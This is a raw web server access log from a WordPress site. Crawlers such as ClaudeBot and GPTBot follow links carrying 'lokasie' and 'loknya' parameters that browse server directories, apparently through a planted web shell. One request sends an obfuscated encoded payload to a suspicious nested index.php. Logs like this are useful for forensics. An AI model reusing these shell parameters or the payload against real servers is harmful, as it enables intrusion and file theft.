216.73.216.125 - - [29/Jul/2026:08:38:18 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins%2Fakismet-da_DK.mo&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins HTTP/2" 200 7915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:18 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/0/7 HTTP/2" 200 1974 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:18 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/class-wp-classic-to-block-menu-converter.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes HTTP/2" 200 2837 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.56 - - [29/Jul/2026:08:38:19 +0200] "GET /category-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/lscache/5/4/b/54b9b1408ec650b8&loknya=/var/www/vhosts/store-bors.dk/lscache/5/4/b HTTP/2" 200 19477 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.243.235 - - [29/Jul/2026:08:38:19 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/9/f HTTP/2" 200 2045 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:19 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/class-wp-block-bindings-registry.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes HTTP/2" 200 3761 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:19 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fmedia-new.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin HTTP/2" 200 3076 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:19 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs%2Fradio.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs HTTP/2" 200 4521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:19 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F6%2F HTTP/2" 200 2068 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [29/Jul/2026:08:36:19 +0200] "GET /wp-includes/SimplePie/library/SimplePie/Net/Net/index.php?ARRAY=7o2230223n313738353331303537392p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353330363937392q3832316631363739316333663138636637653232366639393635396133336364222p2232223n223035353065336239323162373134656535373262646164306539663230643661222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34382q35392q36342q37342q38362q3131227q HTTP/1.1" 500 567 "-" "-"
216.73.216.125 - - [29/Jul/2026:08:38:19 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F8%2F HTTP/2" 200 2142 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:19 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/3 HTTP/2" 200 2036 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:19 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/fonts/class-wp-font-face-resolver.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/fonts HTTP/2" 200 3331 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/fonts" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:20 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Fassets%2F HTTP/2" 200 1995 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:20 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4/ HTTP/2" 200 2072 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4/7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:20 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fjs%2Fdashboard.min.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/2" 200 4801 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:20 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/blocks//query-pagination-previous.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/blocks/ HTTP/2" 200 2829 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/blocks/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:20 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F1%2F HTTP/2" 200 2137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:20 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/ HTTP/2" 200 2135 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:20 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Fa%2Fc HTTP/2" 200 2049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:21 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F0%2F HTTP/2" 200 2085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:21 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F9%2Fa HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:21 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2Fe%2Fc HTTP/2" 200 1997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:21 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns/query-small-posts.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns HTTP/2" 200 2033 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Ff%2Fc HTTP/2" 200 1992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:22 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1/5 HTTP/2" 200 1974 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2F3%2Ff HTTP/2" 200 1979 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:22 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/require-static-blocks.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks HTTP/2" 200 1846 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:22 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2Fc%2F3 HTTP/2" 200 2041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:23 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/8/2 HTTP/2" 200 2037 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:23 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Fthemes%2Fhello-elementor%2Fvendor%2Felementor%2Fupgrades HTTP/2" 200 2025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:23 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2Fd%2F1 HTTP/2" 200 1978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:23 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/block-bindings/term-data.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/block-bindings HTTP/2" 200 2772 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/block-bindings" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:23 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F9%2F HTTP/2" 200 2124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:23 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1/7 HTTP/2" 200 2092 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:23 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FIMG_2013-scaled.jpg.webp&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 163393 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:24 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F9%2Ff HTTP/2" 200 2035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:24 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2Fc%2F7 HTTP/2" 200 1972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:24 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F6%2F2 HTTP/2" 200 1795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:24 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/blocks//require-dynamic-blocks.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/blocks/ HTTP/2" 200 2164 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/blocks/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:24 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F6%2Fa%2F2 HTTP/2" 200 2037 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:25 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/7/0 HTTP/2" 200 1974 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:25 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F7%2Fd HTTP/2" 200 2135 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:25 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/widgets/class-wp-widget-meta.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/widgets HTTP/2" 200 3116 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/widgets" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:38:25 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/9/3 HTTP/2" 200 1983 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:25 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F8%2Fd%2Fc HTTP/2" 200 1993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:25 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Fd%2Fc%2F HTTP/2" 200 1781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:26 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/widgets/class-wp-widget-links.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/widgets HTTP/2" 200 3595 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/widgets" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:26 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Fd%2F4 HTTP/2" 200 1986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:26 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/5/6 HTTP/2" 200 2097 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:26 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2Fc%2F4 HTTP/2" 200 2027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:26 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-includes%2Fjs%2Fwp-emoji-loader.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/2" 200 5414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:27 +0200] "GET /xmlrpc.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2F.myimunify_id&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F HTTP/2" 200 1584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:26 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F3%2F7 HTTP/2" 200 1983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:26 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/require-dynamic-blocks.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks HTTP/2" 200 2170 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:38:26 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1/6 HTTP/2" 200 2047 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:27 +0200] "GET /xmlrpc.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2F8%2Fd%2Fc8dafd25314bcfa5&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2F8%2Fd HTTP/2" 200 25845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:27 +0200] "GET /index.php/'?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2F.temp%2Fc&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2F.temp HTTP/2" 200 2090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:27 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/assets/script-loader-react-refresh-runtime.min.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/assets HTTP/2" 200 1626 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/assets" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:38:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/9/7 HTTP/2" 200 1979 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:27 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F5%2F HTTP/2" 200 2094 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:27 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F5%2F2%2F HTTP/2" 200 2129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/3/5 HTTP/2" 200 1991 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:28 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/class-wp-block-templates-registry.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes HTTP/2" 200 3425 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:28 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2Ff%2Fc HTTP/2" 200 2001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:28 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F1%2Fc HTTP/2" 200 2039 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:29 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.k%2Flsahe%2F HTTP/2" 200 1758 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:29 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/customize HTTP/2" 200 2084 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/customize" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:38:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/5/7 HTTP/2" 200 2030 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:29 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F0%2Fc HTTP/2" 200 1994 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
